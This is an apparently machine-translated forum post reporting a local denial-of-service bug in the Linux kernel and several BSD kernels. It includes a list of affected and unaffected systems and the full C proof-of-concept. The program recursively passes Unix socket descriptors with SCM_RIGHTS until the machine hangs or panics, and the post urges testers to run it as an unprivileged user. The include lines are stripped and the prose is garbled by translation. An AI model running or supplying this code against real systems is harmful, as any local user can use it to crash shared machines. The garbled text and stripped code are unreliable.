Local vulnerability in the Linux kernel (and not only), DoS

    Published code that causes the computer to freeze (100% load of all cores, exhaustion of file descriptors).

    Link to code: lkml.org/lkml/2010/11/25/8

    Checked at 27, 32 - the hang is playing. 32/64 bits.

    I clarify: after 1-2 seconds the crash dump flies (I do not have time to read), the host is overloaded. In another test, the system crashed after the program ended (after about 5-7 seconds).

    PS Experts from the ENT sector say that FreeBSD 8.1 also crashes.

    PPS Suddenly - on CentOS 5.5 since 2.6.18 it does not crash. If run from the root, drops, from the user - just quietly fulfills. In this case, the root in the neighboring console does not interfere with work and the system does not crash.

    Trying to clarify the situation:

    1) CentOS 2.6.18 / 64 with non-privileged user is not affected.
    2) Debian Squeeze 2.6.34 / 64 with an unprivileged user is exposed (kernel panic).
    3) According to rumors, it was possible to reproduce in some FreeBSD (from comments - FreeBSD 8.2-PRERELEASE cannot be reproduced)
    4) From comments - it was not possible to reproduce on Ubuntu 2.6.32 / 64, it is reproduced on 2.6.36.
    5) Ubuntu 2.6.34 / 64 - plays
    6) From the comments - RHEL5.5 does not freeze, but it slows down and prevents to kill the process.
    7) From the comments: FreeBSD 4.11, 8.1, OpebBSD 4.6, 4.8, DragonFLY BSD 2.8.0 - affected
    8) OpenVZ + 2.6.18 Debian / Centos - not playable.

    PPPS for those who test - it is necessary to start from the non-privileged user.

    Test text:

    #include 
    #include 
    static int send_fd (int unix_fd, int fd)
    {
      struct msghdr msgh;
      struct cmsghdr * cmsg;
      char buf [CMSG_SPACE (sizeof (fd))];
      memset (& msgh, 0, sizeof (msgh));
      memset (buf, 0, sizeof (buf));
      msgh.msg_control = buf;
      msgh.msg_controllen = sizeof (buf);
      cmsg = CMSG_FIRSTHDR (& msgh);
      cmsg-> cmsg_len = CMSG_LEN (sizeof (fd));
      cmsg-> cmsg_level = SOL_SOCKET;
      cmsg-> cmsg_type = SCM_RIGHTS;
      msgh.msg_controllen = cmsg-> cmsg_len;
      memcpy (CMSG_DATA (cmsg), & fd, sizeof (fd));
      return sendmsg (unix_fd, & msgh, 0);
    }
    int main ()
    {
      int fd [2], ff [2];
      int target;
      if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd) == - 1)
        return 1;
      for (;;)
      {
        if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff) == - 1)
    	return 2;
        send_fd (ff [0], fd [0]);
        send_fd (ff [0], fd [1]);
        close (fd [1]);
        close (fd [0]);
        fd [0] = ff [0];
        fd [1] = ff [1];
      }
    }
    

    Also popular now: